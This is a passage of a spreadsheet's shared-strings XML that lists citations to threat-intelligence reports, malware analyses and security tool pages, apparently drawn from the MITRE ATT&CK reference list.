    <t>PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.</t>
  </si>
  <si>
    <t>PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.</t>
  </si>
  <si>
    <t>Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.</t>
  </si>
  <si>
    <t>Lancaster, T. (2015, July 25). A tale of Pirpi, Scanbox &amp; CVE-2015-3113. Retrieved March 30, 2016.</t>
  </si>
  <si>
    <t>PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.</t>
  </si>
  <si>
    <t>PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.</t>
  </si>
  <si>
    <t>Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019.</t>
  </si>
  <si>
    <t>Palo Alto Networks. (2021, November 24). Cortex XDR Analytics Alert Reference: Uncommon ARP cache listing via arp.exe. Retrieved December 7, 2021.</t>
  </si>
  <si>
    <t>Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Falcone, R. and Wartell, R.. (2015, July 27). Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.</t>
  </si>
  <si>
    <t>Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieved March 30, 2017.</t>
  </si>
  <si>
    <t>Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.</t>
  </si>
  <si>
    <t>Falcone, R. (2016, July 20). Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.</t>
  </si>
  <si>
    <t>Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.</t>
  </si>
  <si>
    <t>Lancaster, T. and Idrizovic, E.. (2017, June 27). Paranoid PlugX. Retrieved July 13, 2017.</t>
  </si>
  <si>
    <t>Bar, T., Conant, S., Efraim, L. (2016, June 28). Prince of Persia – Game Over. Retrieved July 5, 2017.</t>
  </si>
  <si>
    <t>Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>Levene, B., Falcone, R., Grunzweig, J., Lee, B., Olson, R. (2015, August 20). Retefe Banking Trojan Targets Sweden, Switzerland and Japan. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Ray, V., Hayashi, K. (2016, February 29). New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016.</t>
  </si>
  <si>
    <t>Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.</t>
  </si>
  <si>
    <t>Grunzweig, J. and Miller-Osborn, J.. (2016, February 4). T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques. Retrieved April 15, 2016.</t>
  </si>
  <si>
    <t>Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.</t>
  </si>
  <si>
    <t>Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.</t>
  </si>
  <si>
    <t>Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Falcone, R. &amp; Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Grunzweig, J.. (2017, April 20). Cardinal RAT Active for Over Two Years. Retrieved December 8, 2018.</t>
  </si>
  <si>
    <t>Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.</t>
  </si>
  <si>
    <t>White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>Kasza, A., Halfpop, T. (2016, February 09). NanoCoreRAT Behind an Increase in Tax-Themed Phishing E-mails. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.</t>
  </si>
  <si>
    <t>Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.</t>
  </si>
  <si>
    <t>Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.</t>
  </si>
  <si>
    <t>Eli Collins. (2016, November 25). Windows' Domain Cached Credentials v2. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Passcape. (n.d.). Windows LSA secrets. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Lawrence Abrams. (2017, July 12). PSA: Don't Open SPAM Containing Password Protected Word Docs. Retrieved January 5, 2022.</t>
  </si>
  <si>
    <t>Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.</t>
  </si>
  <si>
    <t>Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.</t>
  </si>
  <si>
    <t>InGuardians. (2022, January 5). Peirates GitHub. Retrieved February 8, 2022.</t>
  </si>
  <si>
    <t>netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>García, C. (2019, April 3). Pentesting Active Directory Forests. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.</t>
  </si>
  <si>
    <t>Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.</t>
  </si>
  <si>
    <t>SS64. (n.d.). system_profiler. Retrieved March 11, 2022.</t>
  </si>
  <si>
    <t>Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell for macOS. Retrieved January 11, 2021.</t>
  </si>
  <si>
    <t>Daniel Petri. (2009, January 8). Setting up a Logon Script through Active Directory Users and Computers in Windows Server 2008. Retrieved November 15, 2019.</t>
  </si>
  <si>
    <t>Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in Microsoft Exchange. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Hassold, Crane. (2018, March 26). Silent Librarian: More to the Story of the Iranian Mabna Institute Indictment. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>halflife. (1997, September 1). Shared Library Redirection Techniques. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2022, February 15). Email exfiltration controls for connectors. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.</t>
  </si>
  <si>
    <t>Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.</t>
  </si>
  <si>
    <t>PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018.</t>
  </si>
  <si>
    <t>Schroeder, W. &amp; Hart M. (2016, October 31). Invoke-Kerberoast. Retrieved March 23, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.</t>
  </si>
  <si>
    <t>PowerSploit. (n.d.). Retrieved December 4, 2014.</t>
  </si>
  <si>
    <t>Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.</t>
  </si>
  <si>
    <t>Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.</t>
  </si>
  <si>
    <t>Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021.</t>
  </si>
  <si>
    <t>Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.</t>
  </si>
  <si>
    <t>ProcessHacker. (2009, October 27). Process Hacker. Retrieved April 11, 2022.</t>
  </si>
  <si>
    <t>Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.</t>
  </si>
  <si>
    <t>ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog)</t>
  </si>
  <si>
    <t>Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.</t>
  </si>
  <si>
    <t>Huss, D. &amp; Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.</t>
  </si>
  <si>
    <t>Merriman, K. and Trouerbach, P. (2022, April 28). This isn't Optimus Prime's Bumblebee but it's Still Transforming. Retrieved August 22, 2022.</t>
  </si>
  <si>
    <t>Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Raggi, M. Schwarz, D.. (2019, August 1). LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.</t>
  </si>
  <si>
    <t>Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors . Retrieved December 9, 2021.</t>
  </si>
  <si>
    <t>Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.</t>
  </si>
  <si>
    <t>Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.</t>
  </si>
  <si>
    <t>Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.</t>
  </si>
  <si>
    <t>Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.</t>
  </si>
  <si>
    <t>Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign . Retrieved June 18, 2019.</t>
  </si>
  <si>
    <t>Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.</t>
  </si>
  <si>
    <t>Russinovich, M. (2004, June 28). PsExec. Retrieved December 17, 2015.</t>
  </si>
  <si>
    <t>Michael Swanagan. (2020, October 24). 7 Data Loss Prevention Best Practices &amp; Strategies. Retrieved August 30, 2021.</t>
  </si>
  <si>
    <t>Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.</t>
  </si>
  <si>
    <t>Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>Dani, M. (2022, March 1). Ukrainian Targets Hit by HermeticWiper, New Datawiper Malware. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022.</t>
  </si>
  <si>
    <t>Kaspersky Labs assesses [SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) is an older variant of a malware family it refers to as the QueenOfClubs.(Citation: Kaspersky IAmTheKing October 2020)</t>
  </si>
  <si>
    <t>Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.</t>
  </si>
  <si>
    <t>Beaumont, K. (2017, March 19). RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.</t>
  </si>
  <si>
    <t>Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M. Retrieved March 28, 2022.</t>
  </si>
  <si>
    <t>IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Dirk-jan Mollema. (2022, January 31). ROADtools. Retrieved January 31, 2022.</t>
  </si>
  <si>
    <t>RSA. (2017, November 21). THE CARBANAK/FIN7 SYNDICATE A HISTORICAL OVERVIEW OF AN EVOLVING THREAT. Retrieved July 29, 2020.</t>
  </si>
  <si>
    <t>Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016.</t>
  </si>
  <si>
    <t>Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Adair, S. (2017, February 17). Detecting and Responding to Advanced Threats within Exchange Environments. Retrieved March 20, 2017.</t>
  </si>
  <si>
    <t>Maccaglia, S. (2015, November 4). Evolving Threats: dissection of a CyberEspionage attack. Retrieved April 4, 2018.</t>
  </si>
  <si>
    <t>Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>Tsarfaty, Y. (2018, July 25). Micropsia Malware. Retrieved November 13, 2018.</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware</t>
  </si>
  <si>
    <t>Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.</t>
  </si>
  <si>
    <t>Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.</t>
  </si>
  <si>
    <t>Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.</t>
  </si>
  <si>
    <t>Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.</t>
  </si>
  <si>
    <t>Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.</t>
  </si>
  <si>
    <t>Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.</t>
  </si>
  <si>
    <t>Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.</t>
  </si>
  <si>
    <t>Ready.gov. (n.d.). IT Disaster Recovery Plan. Retrieved March 15, 2019.</t>
  </si>
  <si>
    <t>Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.</t>
  </si>
  <si>
    <t>Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.</t>
  </si>
  <si>
    <t>Insikt Group (Recorded Future). (2017, May 17). Recorded Future Research Concludes Chinese Ministry of State Security Behind APT3. Retrieved June 18, 2017.</t>
  </si>
  <si>
    <t>Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>Insikt Group. (2021, December 8). Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia. Retrieved September 19, 2022.</t>
  </si>
  <si>
    <t>Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.</t>
  </si>
  <si>
    <t>INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.</t>
  </si>
  <si>
    <t>Insikt Group. (2020, March 12). Swallowing the Snake’s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Insikt Group. (2022, January 18). 2021 Adversary Infrastructure Report. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Red Canary. (2021, March 31). 2021 Threat Detection Report. Retrieved August 31, 2021.</t>
  </si>
  <si>
    <t>Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.</t>
  </si>
  <si>
    <t>Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.</t>
  </si>
  <si>
    <t>Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021.</t>
  </si>
  <si>
    <t>Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.</t>
  </si>
  <si>
    <t>Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.</t>
  </si>
  <si>
    <t>Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.</t>
  </si>
  <si>
    <t>Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.</t>
  </si>
  <si>
    <t>Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021.</t>
  </si>
  <si>
    <t>Thomson, I. (2017, September 26). Deloitte is a sitting duck: Key systems with RDP open, VPN and proxy 'login details leaked'. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017.</t>
  </si>
  <si>
    <t>Mike Burns, Matthew McWhirt, Douglas Bienstock, Nick Bennett. (2021, January 19). Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452. Retrieved September 25, 2021.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.</t>
  </si>
  <si>
    <t>Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Routin, D. (2017, November 13). Abusing network shares for efficient lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.</t>
  </si>
  <si>
    <t>Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.</t>
  </si>
  <si>
    <t>Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.</t>
  </si>
  <si>
    <t>Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021.</t>
  </si>
  <si>
    <t>Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021.</t>
  </si>
  <si>
    <t>Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform – Part 1 (IAM). Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Gietzen, S. (n.d.). S3 Ransomware Part 2: Prevention and Defense. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.</t>
  </si>
  <si>
    <t>Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.</t>
  </si>
  <si>
    <t>Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.</t>
  </si>
  <si>
    <t>Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Dirk-jan Mollema. (2020, April 16). Introducing ROADtools - The Azure AD exploration framework. Retrieved January 31, 2022.</t>
  </si>
  <si>
    <t>Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017)</t>
  </si>
  <si>
    <t>Catalin Cimpanu. (2021, December 9). Russian hackers bypass 2FA by annoying victims with repeated push notifications. Retrieved March 31, 2022.</t>
  </si>
  <si>
    <t>Cyber Security Infrastructure Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved May 31, 2022.</t>
  </si>
  <si>
    <t>Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.</t>
  </si>
  <si>
    <t>Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.</t>
  </si>
  <si>
    <t>Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.</t>
  </si>
  <si>
    <t>Travis Clarke. (2020, March 21). S3Recon GitHub. Retrieved March 4, 2022.</t>
  </si>
  <si>
    <t>Beechey, J.. (2014, November 18). Application Whitelisting:  Panacea or Propaganda?. Retrieved November 18, 2014.</t>
  </si>
  <si>
    <t>Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.</t>
  </si>
  <si>
    <t>Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.</t>
  </si>
  <si>
